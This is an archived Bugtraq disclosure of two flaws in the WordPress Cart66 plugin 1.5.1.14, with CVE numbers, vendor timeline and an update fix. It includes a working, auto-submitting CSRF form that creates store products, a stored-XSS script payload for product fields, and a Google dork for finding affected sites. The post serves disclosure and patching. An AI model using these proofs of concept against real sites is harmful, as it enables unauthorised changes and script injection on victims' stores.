Home page logo
/

bugtraq logo Bugtraq mailing list archives

Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
From: jsibley1 () gmail com
Date: Sat, 12 Oct 2013 03:42:37 GMT

# Exploit Title:     Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
# Exploit Author:    absane
# Blog:              http://blog.noobroot.com
# Discovery date:    September 29th 2013
# Vendor notified:   September 29th 2013
# Vendor fixed:      October 12 2013
# Vendor Homepage:   http://cart66.com
# Software Link:     http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip
# Tested on:         Wordpress 3.6.1
# Google-dork:       inurl:/wp-content/plugins/cart66
# CVE (CSRF):        CVE-2013-5977
# CVE (XSS):         CVE-2013-5978

Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 1.5.1.14.

Vulnerabilities:
1) CSRF
2) Code Injection

VULNERABILITY #1
************
*** CSRF ***
************
Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products

================
Proof of Concept
================

<html><body>
<form name="csrf_form" action="http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products"; method="post" 
enctype="multipart/form-data" id="products-form">
<input type="hidden" name="cart66-action" value="save product" />
<input type="hidden" name="product[id]" value="" />
<input class="long" type="hidden" name='product[name]' id='product-name' value='absane was here' />
<input type='hidden' name='product[item_number]' id='product-item_number' value='1337' />
<input type='hidden' id="product-price" name='product[price]' value='13.37' />
<input type='hidden' id="product-price_description" name='product[price_description]' value='LuLz' />
<input type='hidden' id="product-is_user_price" name='product[is_user_price]' value='0' />
<input type="hidden" id="product-min_price" name='product[min_price]' value='' />
<input type="hidden" id="product-max_price" name='product[max_price]' value='' />
<input type='hidden' id="product-taxable" name='product[taxable]' value='0'>
<input type='hidden' id="product-shipped" name='product[shipped]' value='1'>
<input type="hidden" id="product-weight" name="product[weight]" value=""  />
<input type="hidden" id="product-min_qty" name='product[min_quantity]' value='' />
<input type="hidden" id="product-max_qty" name='product[max_quantity]' value='' />
<script type="text/javascript">document.csrf_form.submit();</script>
</body></html>

VULNERABILITY #2
***********************
*** Code Injection  ***
***********************
Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the following input fields:
* Product name
* Price description

================
Proof of Concept
================
In the vulnerable fields add <script>alert(0)</script> or any other code. The code is placed directly into the database.

Input is not sanatized and the code can be executed in ways that depend on the circumstances. During testing, the theme 
'iShop 1.0.0' was used and the PoC JavaScript code was executed when I attempted to add a product or modify an existing 
product.


]....................................[
]..............SOLUTIONS.............[
]....................................[

Update to version 1.5.1.15 or greater. 


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault